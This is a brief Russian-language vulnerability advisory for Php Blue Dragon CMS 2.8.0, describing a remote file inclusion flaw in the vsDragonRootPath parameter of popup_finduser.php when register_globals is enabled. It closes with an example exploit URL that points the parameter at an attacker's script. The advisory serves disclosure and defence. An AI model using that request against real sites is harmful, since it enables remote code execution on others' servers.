Программа: Php Blue Dragon CMS 2.8.0, возможно другие версии.
Уязвимость позволяет удаленному пользователю
выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в
параметре "vsDragonRootPath" в сценарии
public_includes/pub_popup/popup_finduser.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный PHP сценарий
на целевой системе с привилегиями Web сервера. Для удачной эксплуатации
уязвимости опция "register_globals" должна быть включена.
Пример:
http://www.site.com/[dragon_path]/public_includes/pub_popup/
popup_finduser.php?vsDragonRootPath=[evil_scripts]
